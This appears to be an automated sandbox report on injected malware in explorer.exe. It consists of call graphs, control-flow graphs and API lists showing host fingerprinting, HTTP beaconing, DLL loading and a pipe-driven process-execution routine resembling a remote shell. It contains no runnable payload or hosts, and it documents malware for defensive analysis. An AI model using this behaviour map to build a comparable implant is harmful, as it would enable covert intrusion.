4223->4224 4225 30539ff 4224->4225 4226 305b388 NtAllocateVirtualMemory 4225->4226 4227 3053a12 4226->4227 4228 3056fc0 NtAllocateVirtualMemory 4227->4228 4229 3053ad6 4227->4229 4227->4259 4236 3053a63 4228->4236 4230 3053b77 4229->4230 4231 3056fc0 NtAllocateVirtualMemory 4229->4231 4232 3056fc0 NtAllocateVirtualMemory 4230->4232 4233 3053c18 4230->4233 4241 3053b04 4231->4241 4242 3053ba5 4232->4242 4234 3053cb9 4233->4234 4235 3056fc0 NtAllocateVirtualMemory 4233->4235 4237 3056fc0 NtAllocateVirtualMemory 4234->4237 4238 3053d5a 4234->4238 4249 3053c46 4235->4249 4236->4229 4247 305be64 3 API calls 4236->4247 4250 3053ce7 4237->4250 4239 3053dfb 4238->4239 4240 3056fc0 NtAllocateVirtualMemory 4238->4240 4243 3056fc0 NtAllocateVirtualMemory 4239->4243 4244 3053e9c 4239->4244 4261 3053d88 4240->4261 4241->4230 4255 305be64 3 API calls 4241->4255 4242->4233 4257 305be64 3 API calls 4242->4257 4263 3053e29 4243->4263 4245 3053f3d 4244->4245 4248 3056fc0 NtAllocateVirtualMemory 4244->4248 4251 3056fc0 NtAllocateVirtualMemory 4245->4251 4254 3053fde 4245->4254 4246 3054138 4340 3052988 4246->4340 4252 3053abd 4247->4252 4272 3053eca 4248->4272 4249->4234 4267 305be64 3 API calls 4249->4267 4250->4238 4269 305be64 3 API calls 4250->4269 4275 3053f6b 4251->4275 4258 305be64 3 API calls 4252->4258 4256 305408b 4254->4256 4260 3056fc0 NtAllocateVirtualMemory 4254->4260 4262 3053b5e 4255->4262 4256->4246 4264 3056fc0 NtAllocateVirtualMemory 4256->4264 4265 3053bff 4257->4265 4266 3053acc 4258->4266 4284 305400c 4260->4284 4261->4239 4278 305be64 3 API calls 4261->4278 4268 305be64 3 API calls 4262->4268 4263->4244 4281 305be64 3 API calls 4263->4281 4290 30540b9 4264->4290 4270 305be64 3 API calls 4265->4270 4271 30582b4 NtFreeVirtualMemory 4266->4271 4273 3053ca0 4267->4273 4274 3053b6d 4268->4274 4276 3053d41 4269->4276 4277 3053c0e 4270->4277 4271->4229 4272->4245 4287 305be64 3 API calls 4272->4287 4279 305be64 3 API calls 4273->4279 4280 30582b4 NtFreeVirtualMemory 
4274->4280 4275->4254 4295 305be64 3 API calls 4275->4295 4282 305be64 3 API calls 4276->4282 4283 30582b4 NtFreeVirtualMemory 4277->4283 4285 3053de2 4278->4285 4286 3053caf 4279->4286 4280->4230 4291 3053e83 4281->4291 4292 3053d50 4282->4292 4283->4233 4284->4256 4298 305be64 3 API calls 4284->4298 4288 305be64 3 API calls 4285->4288 4289 30582b4 NtFreeVirtualMemory 4286->4289 4293 3053f24 4287->4293 4294 3053df1 4288->4294 4289->4234 4290->4246 4305 305be64 3 API calls 4290->4305 4296 305be64 3 API calls 4291->4296 4297 30582b4 NtFreeVirtualMemory 4292->4297 4299 305be64 3 API calls 4293->4299 4300 30582b4 NtFreeVirtualMemory 4294->4300 4301 3053fc5 4295->4301 4302 3053e92 4296->4302 4297->4238 4303 305406c 4298->4303 4304 3053f33 4299->4304 4300->4239 4306 305be64 3 API calls 4301->4306 4307 30582b4 NtFreeVirtualMemory 4302->4307 4308 305be64 3 API calls 4303->4308 4309 30582b4 NtFreeVirtualMemory 4304->4309 4310 3054119 4305->4310 4311 3053fd4 4306->4311 4307->4244 4312 305407e 4308->4312 4309->4245 4313 305be64 3 API calls 4310->4313 4314 30582b4 NtFreeVirtualMemory 4311->4314 4315 30582b4 NtFreeVirtualMemory 4312->4315 4316 305412b 4313->4316 4314->4254 4315->4256 4317 30582b4 NtFreeVirtualMemory 4316->4317 4317->4246 4319 30521e4 4318->4319 4320 30521f6 6 API calls 4319->4320 4366 3052134 4320->4366 4322 3052333 CreateProcessW 4323 305b388 NtAllocateVirtualMemory 4322->4323 4324 3052399 4323->4324 4325 305b388 NtAllocateVirtualMemory 4324->4325 4334 30523d6 4325->4334 4326 30525e8 4329 30525fa 4326->4329 4331 30582b4 NtFreeVirtualMemory 4326->4331 4327 3052401 PeekNamedPipe 4330 30524b9 PeekNamedPipe 4327->4330 4327->4334 4328 30525a0 TerminateProcess CloseHandle CloseHandle CloseHandle CloseHandle 4328->4326 4329->4205 4332 3052569 GetExitCodeProcess 4330->4332 4330->4334 4331->4329 4333 305258f 4332->4333 4332->4334 4333->4328 4334->4326 4334->4327 4334->4328 4334->4330 4334->4332 4336 3052468 ReadFile 4334->4336 4337 3052518 ReadFile 4334->4337 4367 
305c704 NtDelayExecution 4334->4367 4338 305be64 3 API calls 4336->4338 4339 305be64 3 API calls 4337->4339 4338->4330 4339->4332 4341 3052b17 4340->4341 4342 305299d 4340->4342 4341->4259 4342->4341 4343 30529ca 4342->4343 4344 30582b4 NtFreeVirtualMemory 4342->4344 4345 30529ea 4343->4345 4346 30582b4 NtFreeVirtualMemory 4343->4346 4344->4343 4347 3052a0a 4345->4347 4348 30582b4 NtFreeVirtualMemory 4345->4348 4346->4345 4349 3052a2a 4347->4349 4350 30582b4 NtFreeVirtualMemory 4347->4350 4348->4347 4351 3052a4a 4349->4351 4352 30582b4 NtFreeVirtualMemory 4349->4352 4350->4349 4353 3052a6a 4351->4353 4355 30582b4 NtFreeVirtualMemory 4351->4355 4352->4351 4354 3052a8a 4353->4354 4356 30582b4 NtFreeVirtualMemory 4353->4356 4357 3052aaa 4354->4357 4358 30582b4 NtFreeVirtualMemory 4354->4358 4355->4353 4356->4354 4359 3052aca 4357->4359 4360 30582b4 NtFreeVirtualMemory 4357->4360 4358->4357 4361 3052aea 4359->4361 4362 30582b4 NtFreeVirtualMemory 4359->4362 4360->4359 4363 3052b0a 4361->4363 4365 30582b4 NtFreeVirtualMemory 4361->4365 4362->4361 4364 30582b4 NtFreeVirtualMemory 4363->4364 4364->4341 4365->4363 4366->4322 4367->4334 4368 3054384 4369 30543a5 4368->4369 4370 30543a7 4368->4370 4372 30543c4 4370->4372 4373 30541b4 129 API calls 4372->4373 4374 30543cd 4373->4374 4375 30543eb 4374->4375 4377 305c704 NtDelayExecution 4374->4377 4375->4369 4377->4374 4411 305bb44 4412 305bbc5 4411->4412 4413 305bb62 4411->4413 4414 305bb8e CreateFileMappingA 4413->4414 4414->4412 4415 305bbcc MapViewOfFile 4414->4415 4415->4412 4417 305bbff 4415->4417 4416 305bcd5 VirtualFree 4418 30582b4 NtFreeVirtualMemory 4416->4418 4417->4416 4419 305b388 NtAllocateVirtualMemory 4417->4419 4420 305bd06 UnmapViewOfFile CloseHandle 4418->4420 4421 305bc35 4419->4421 4420->4412 4422 305be64 3 API calls 4421->4422 4423 305bc87 4422->4423 4424 305be64 3 API calls 4423->4424 4425 305bc99 4424->4425 4426 305bfc0 NtAllocateVirtualMemory 4425->4426 4427 305bcaf 4426->4427 4428 30582b4 
NtFreeVirtualMemory 4427->4428 4429 305bccb 4428->4429 4430 30582b4 NtFreeVirtualMemory 4429->4430 4430->4416 4431 305c5c0 4432 305c641 4431->4432 4433 305c5de 4431->4433 4434 305c60a CreateFileMappingA 4433->4434 4434->4432 4435 305c648 MapViewOfFile 4434->4435 4435->4432 4436 305c67b 4435->4436 4441 305ca9c 4436->4441 4439 30582b4 NtFreeVirtualMemory 4440 305c6d1 UnmapViewOfFile CloseHandle 4439->4440 4440->4432 4442 305c6a0 VirtualFree 4441->4442 4443 305caad 4441->4443 4442->4439 4447 305ca68 4443->4447 4446 30582b4 NtFreeVirtualMemory 4446->4442 4448 305ca7d 4447->4448 4449 305ca8b 4447->4449 4450 305ca68 NtFreeVirtualMemory 4448->4450 4451 30582b4 NtFreeVirtualMemory 4449->4451 4450->4449 4452 305ca95 4451->4452 4452->4446 4176 305545d 4177 3055265 4176->4177 4186 30553a4 4176->4186 4179 3055315 4177->4179 4180 3055292 4177->4180 4178 30582b4 NtFreeVirtualMemory 4194 3055456 4178->4194 4182 305532e HttpOpenRequestA 4179->4182 4181 30552ab HttpOpenRequestA 4180->4181 4185 305539c 4181->4185 4182->4185 4185->4186 4187 30553d6 4185->4187 4188 30553b3 InternetSetOptionA 4185->4188 4186->4178 4186->4194 4189 3055424 HttpSendRequestA 4187->4189 4193 30553e0 4187->4193 4188->4187 4190 3055443 4189->4190 4190->4186 4191 305544c 4190->4191 4192 30582b4 NtFreeVirtualMemory 4191->4192 4192->4194 4195 30553fb HttpSendRequestA 4193->4195 4195->4190 4453 305b86c 4454 305b880 4453->4454 4455 305b8c6 4453->4455 4456 305b89e VirtualFree 4454->4456 4457 30582b4 NtFreeVirtualMemory 4456->4457 4457->4455 4196 3058a58 4197 3058a72 4196->4197 4198 3058a79 4196->4198 4198->4197 4199 3058b63 GetProcAddress GetProcAddressForCaller 4198->4199 4199->4197 4378 3057528 4379 3057548 4378->4379 4380 305754f 4378->4380 4380->4379 4381 3056fc0 NtAllocateVirtualMemory 4380->4381 4382 30576a7 4381->4382 4384 305c734 4382->4384 4385 305c74f 4384->4385 4387 305c74a 4384->4387 4386 305b388 NtAllocateVirtualMemory 4385->4386 4386->4387 4387->4379 4408 30544b8 4409 30543c4 129 API calls 4408->4409 
4410 30544c1 4409->4410 4388 305922b 4389 3059086 4388->4389 4390 305904b InternetOpenW 4388->4390 4391 305923d InternetCloseHandle 4389->4391 4392 3059248 4389->4392 4390->4389 4393 305908b 4390->4393 4391->4392 4394 3059250 InternetCloseHandle 4392->4394 4395 305925b 4392->4395 4396 30555dc 3 API calls 4393->4396 4394->4395 4397 30590ca 4396->4397 4397->4389 4398 30590f4 4397->4398 4399 305c860 8 API calls 4397->4399 4400 3059106 4398->4400 4401 30582b4 NtFreeVirtualMemory 4398->4401 4399->4398 4402 3059118 InternetOpenUrlW 4400->4402 4403 30582b4 NtFreeVirtualMemory 4400->4403 4401->4400 4402->4389 4405 3059154 4402->4405 4403->4402 4404 305915f InternetReadFile 4404->4405 4405->4389 4405->4404 4406 305b388 NtAllocateVirtualMemory 4405->4406 4407 305b648 3 API calls 4405->4407 4406->4405 4407->4405 4458 305696b 4483 3055b7a new[] 4458->4483 4459 30569a2 GetExitCodeThread 4459->4483 4460 30569de GetExitCodeThread 4460->4483 4461 3055ba7 4462 305c704 NtDelayExecution 4462->4483 4463 305b388 NtAllocateVirtualMemory 4463->4483 4464 3055484 3 API calls 4464->4483 4465 305bfc0 NtAllocateVirtualMemory 4465->4483 4466 3056404 wsprintfA 4466->4483 4467 3055f36 wsprintfA 4467->4483 4468 3056025 wsprintfA 4468->4483 4469 305be64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4469->4483 4470 3058424 11 API calls 4470->4483 4471 305b770 NtAllocateVirtualMemory 4471->4483 4472 305b388 NtAllocateVirtualMemory 4473 3056187 WideCharToMultiByte 4472->4473 4475 305be64 3 API calls 4473->4475 4474 305b388 NtAllocateVirtualMemory 4477 3056243 WideCharToMultiByte 4474->4477 4475->4483 4476 305b388 NtAllocateVirtualMemory 4479 30562ff WideCharToMultiByte 4476->4479 4478 305be64 3 API calls 4477->4478 4478->4483 4480 305be64 3 API calls 4479->4480 4480->4483 4481 3056fc0 NtAllocateVirtualMemory 4481->4483 4482 30582b4 NtFreeVirtualMemory 4482->4483 4483->4459 4483->4460 4483->4461 4483->4462 4483->4463 4483->4464 4483->4465 4483->4466 4483->4467 4483->4468 4483->4469 
4483->4470 4483->4471 4483->4472 4483->4474 4483->4476 4483->4481 4483->4482 4484 3054e28 14 API calls 4483->4484 4485 3058bdc GetCursorPos GetTickCount RtlRandom 4483->4485 4486 3056cfc NtAllocateVirtualMemory 4483->4486 4487 3055734 73 API calls 4483->4487 4484->4483 4485->4483 4486->4483 4487->4483

Control-flow Graph

[Graph of the function at 3058424; legend: executed / not executed blocks]

APIs
  • Part of subcall function 0305B388: NtAllocateVirtualMemory.NTDLL ref: 0305B3BE
• GetAdaptersInfo.IPHLPAPI ref: 03058470
• GetAdaptersInfo.IPHLPAPI ref: 030584A7
• wsprintfA.USER32 ref: 030584F0
• wsprintfA.USER32 ref: 030585DB
• wsprintfA.USER32 ref: 0305863F
Strings
Memory Dump Source
• Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
Similarity
• API ID: wsprintf$AdaptersInfo$AllocateMemoryVirtual
• String ID: o
• API String ID: 2074107575-252678980
• Opcode ID: 74334035a4c2000bc66b90e9c9b675ea5675b32aeaf99ff9f650a8c8c6a1f5dc
• Instruction ID: ae3974ad7e363a4276b6dee5088b009c394f24022a855e94f709c924305512d6
• Opcode Fuzzy Hash: 74334035a4c2000bc66b90e9c9b675ea5675b32aeaf99ff9f650a8c8c6a1f5dc
• Instruction Fuzzy Hash: 1FA1A77620AB848ADB60CB15E49036BB7A4F788784F444525FE8E83B69EF7CC654CF44

Control-flow Graph

[Graph of the function at 3057274; legend: executed / not executed blocks]

APIs
• GetAdaptersInfo.IPHLPAPI ref: 0305729C
  • Part of subcall function 0305B388: NtAllocateVirtualMemory.NTDLL ref: 0305B3BE
• GetAdaptersInfo.IPHLPAPI ref: 030572C7
Strings
Memory Dump Source
• Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
Similarity
• API ID: AdaptersInfo$AllocateMemoryVirtual
• String ID: o
                                                                                                                                                                                                                                                                      • API String ID: 2718687846-252678980
                                                                                                                                                                                                                                                                      • Opcode ID: 7f42663b622c32a3db8ec0ccf10743740cf63e3247e40a922d1c01b602dc0a8d
                                                                                                                                                                                                                                                                      • Instruction ID: 4a238ca3a3d571ee233ce19bd2fb95e593e9af9681406d87dd34b54031fe3d24
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7f42663b622c32a3db8ec0ccf10743740cf63e3247e40a922d1c01b602dc0a8d
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9101B37660AB4486DB70DB15E49435EB7A0F3C8BA8F480265FA8D47B28DB7CC685CF04

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 179 305a8e0-305a8fb call 3058cf0 182 305a904-305a918 call 305b4cc 179->182 183 305a8fd-305a8ff 179->183 187 305a926-305a92b 182->187 188 305a91a-305a924 182->188 184 305aa04-305aa0b 183->184 189 305a930-305a941 call 305bf78 187->189 188->189 192 305a943-305a945 189->192 193 305a94a-305a983 call 305b470 FindFirstFileW 189->193 192->184 196 305a9f5-305a9ff call 30582b4 193->196 197 305a985-305a98a 193->197 196->184 197->196 199 305a98c-305a9a1 FindNextFileW 197->199 200 305a9a5-305a9ab 199->200 201 305a9a3 199->201 203 305a9ad 200->203 204 305a9af-305a9dc call 305c144 call 3057430 200->204 201->196 203->196 209 305a9f3 204->209 210 305a9de-305a9f1 LoadLibraryW 204->210 209->197 210->196
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: DirectorySystem
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2188284642-0
                                                                                                                                                                                                                                                                      • Opcode ID: ba65162137a8887c46524e037aee2d8e48247b8fd7d5144eb10fde51ea88d61c
                                                                                                                                                                                                                                                                      • Instruction ID: f05534c3a5404166811efa79761d3442754b24a7cbf4e342d5fc8b02e821d1ef
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba65162137a8887c46524e037aee2d8e48247b8fd7d5144eb10fde51ea88d61c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B831102221AA91D6DB61DB24E48435FB3A4F7C4364F500726FAEE86AA8DF3CC545CB00

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      control_flow_graph 221 305b388-305b3c6 NtAllocateVirtualMemory 222 305b3d7-305b3e0 221->222 223 305b3c8-305b3d2 call 305b470 221->223 223->222
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • NtAllocateVirtualMemory.NTDLL ref: 0305B3BE
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                                      • API String ID: 2167126740-2766056989
                                                                                                                                                                                                                                                                      • Opcode ID: 2e93f9f6b96c1bd6ea69c113b3f2c8e4b302791aa10c0df241b540a453c9b905
                                                                                                                                                                                                                                                                      • Instruction ID: 0481be34d49ee6dd273ac2a819a78d201c49a6cc1f12eaf976defbdbec59482f
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e93f9f6b96c1bd6ea69c113b3f2c8e4b302791aa10c0df241b540a453c9b905
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57E015A6229A8482D7109F24E45474BB760F7847B8F801301BAA90ABD8CBBCC108CF00

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      control_flow_graph 243 3055078-30550ba 244 30550bc-30550dc InternetReadFile 243->244 245 305514f 244->245 246 30550de-30550e3 244->246 247 3055154-305515c 245->247 246->245 248 30550e5-3055102 call 305b704 246->248 251 3055104-3055106 248->251 252 3055108-305514a call 305b3e4 248->252 251->247 252->244
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: FileInternetRead
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 778332206-0
                                                                                                                                                                                                                                                                      • Opcode ID: 29b86a3ab9ddbe11ce9b9fbde145847ecb2975815f7cf14476ac95fa9b6fe6b1
                                                                                                                                                                                                                                                                      • Instruction ID: e4d46b57cc763cfc05d8e10b255ffaac4f781d997a41f7cfc3b5b9165a27e8c7
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 29b86a3ab9ddbe11ce9b9fbde145847ecb2975815f7cf14476ac95fa9b6fe6b1
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1721E8363296859BDB60CA19E45479AB7E5F3CCB84F804125EA8E83B58EB7DC644CF04

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      control_flow_graph 259 30582b4-30582cc 260 30582ef-30582f3 259->260 261 30582ce-30582eb NtFreeVirtualMemory 259->261 261->260
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: FreeMemoryVirtual
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3963845541-0
                                                                                                                                                                                                                                                                      • Opcode ID: db712fdc7e1c69cc4b3c08b17230264df9142ca57683cf2c056e2540a21d56f0
                                                                                                                                                                                                                                                                      • Instruction ID: 4bc0fa2586770e22982b23dddcd1680671003f5393507fc27f231c57ffece3ac
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db712fdc7e1c69cc4b3c08b17230264df9142ca57683cf2c056e2540a21d56f0
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57E0EC72608A8182D7619B64E40438ABB64F3853B8F944305EAF816AE8CF7CC299CB04

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      control_flow_graph 262 305c704-305c730 NtDelayExecution
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: DelayExecution
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1249177460-0
                                                                                                                                                                                                                                                                      • Opcode ID: 551b8892589dcd62e4628d181c76442dc689c90fb238e82810fb464567079569
                                                                                                                                                                                                                                                                      • Instruction ID: 4f21d4ea45469e53f0ae5f3949b49ab8f7581cce462089660bcfe93428fbb235
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 551b8892589dcd62e4628d181c76442dc689c90fb238e82810fb464567079569
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0CD0C77260968087CB155B18E44520E7764F795344FD04519E68D45758DE3CC265CF04

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      control_flow_graph 107 3055160-30551c7 call 305b388 call 305b4cc 112 30551c9-30551d6 107->112 113 30551d8-30551e0 107->113 114 30551e5-305520d call 305be64 112->114 113->114 117 3055265-3055275 114->117 118 305520f-3055226 call 305b4cc 114->118 119 3055284-305528c 117->119 120 3055277-3055280 117->120 127 3055237-305523f 118->127 128 3055228-3055235 118->128 122 3055315-305532c call 305b4cc 119->122 123 3055292-30552a9 call 305b4cc 119->123 120->119 135 3055340-3055348 122->135 136 305532e-305533e 122->136 133 30552ab-30552b8 123->133 134 30552ba-30552c2 123->134 131 3055244-3055260 call 305be64 * 2 127->131 128->131 131->117 139 30552c7-3055310 HttpOpenRequestA 133->139 134->139 137 3055350-3055397 HttpOpenRequestA 135->137 136->137 140 305539c-30553a2 137->140 139->140 142 30553a4 140->142 143 30553a9-30553b1 140->143 144 3055467-305546d 142->144 145 30553d6-30553de 143->145 146 30553b3-30553d0 InternetSetOptionA 143->146 147 305546f-3055474 call 30582b4 144->147 148 3055479 144->148 149 3055424-305543f HttpSendRequestA 145->149 150 30553e0-3055422 call 305c0fc * 2 HttpSendRequestA 145->150 146->145 147->148 152 305547b-3055482 148->152 154 3055443-3055448 149->154 150->154 156 305544c-305545b call 30582b4 154->156 157 305544a 154->157 156->152 157->144
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 0305B388: NtAllocateVirtualMemory.NTDLL ref: 0305B3BE
                                                                                                                                                                                                                                                                      • HttpOpenRequestA.WININET ref: 03055305
                                                                                                                                                                                                                                                                      • HttpOpenRequestA.WININET ref: 03055391
                                                                                                                                                                                                                                                                      • InternetSetOptionA.WININET ref: 030553D0
                                                                                                                                                                                                                                                                      • HttpSendRequestA.WININET ref: 03055418
                                                                                                                                                                                                                                                                      • HttpSendRequestA.WININET ref: 03055439
                                                                                                                                                                                                                                                                        • Part of subcall function 030582B4: NtFreeVirtualMemory.NTDLL ref: 030582E5
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: HttpRequest$MemoryOpenSendVirtual$AllocateFreeInternetOption

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      control_flow_graph 174 3058d3c-3058d6c call 305b470 GetUserNameA 177 3058d87-3058d95 174->177 178 3058d6e-3058d81 wsprintfA 174->178 178->177
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: NameUserwsprintf
                                                                                                                                                                                                                                                                      • String ID: alfons

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      control_flow_graph 211 3058c30-3058c7b call 305b470 * 2 FindFirstVolumeW 216 3058c81-3058cd8 GetVolumeInformationW FindVolumeClose 211->216 217 3058c7d-3058c7f 211->217 219 3058ce3 216->219 220 3058cda-3058ce1 216->220 218 3058ce5-3058cec 217->218 219->218 220->218
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • FindFirstVolumeW.KERNEL32 ref: 03058C6A
                                                                                                                                                                                                                                                                      • GetVolumeInformationW.KERNEL32 ref: 03058CBE
                                                                                                                                                                                                                                                                      • FindVolumeClose.KERNEL32 ref: 03058CCD
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Volume$Find$CloseFirstInformation

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      control_flow_graph 225 3058a58-3058a70 226 3058a72-3058a74 225->226 227 3058a79-3058acc 225->227 228 3058bd4-3058bd8 226->228 229 3058ad8-3058ae4 227->229 230 3058bd2 229->230 231 3058aea-3058b41 call 305c0fc call 3057430 229->231 230->228 236 3058b47-3058b4d 231->236 237 3058bcd 231->237 236->237 238 3058b4f-3058b57 236->238 237->229 238->237 240 3058b59-3058b61 238->240 241 3058b75-3058bcb 240->241 242 3058b63-3058b73 GetProcAddress GetProcAddressForCaller 240->242 241->228 242->241
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AddressProc

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      control_flow_graph 255 3056c6c-3056ca1 CreateThread 256 3056ca3-3056ca8 255->256 257 3056caa 255->257 258 3056cac-3056cb0 256->258 257->258
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2422867632-0

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • CreatePipe.KERNEL32 ref: 03052233
                                                                                                                                                                                                                                                                      • SetHandleInformation.KERNEL32 ref: 0305224D
                                                                                                                                                                                                                                                                      • CreatePipe.KERNEL32 ref: 0305226E
                                                                                                                                                                                                                                                                      • SetHandleInformation.KERNEL32 ref: 03052288
                                                                                                                                                                                                                                                                      • CreatePipe.KERNEL32 ref: 030522A9
                                                                                                                                                                                                                                                                      • SetHandleInformation.KERNEL32 ref: 030522C3
                                                                                                                                                                                                                                                                      • CreateProcessW.KERNEL32 ref: 03052385
                                                                                                                                                                                                                                                                        • Part of subcall function 0305B388: NtAllocateVirtualMemory.NTDLL ref: 0305B3BE
                                                                                                                                                                                                                                                                      • PeekNamedPipe.KERNEL32 ref: 03052434
                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32 ref: 03052490
                                                                                                                                                                                                                                                                      • PeekNamedPipe.KERNEL32 ref: 030524E4
                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32 ref: 03052540
                                                                                                                                                                                                                                                                      • GetExitCodeProcess.KERNEL32 ref: 03052579
                                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32 ref: 030525AA
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 030525B8
                                                                                                                                                                                                                                                                        • Part of subcall function 0305C704: NtDelayExecution.NTDLL ref: 0305C726
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 030525C6
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 030525D4
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 030525E2
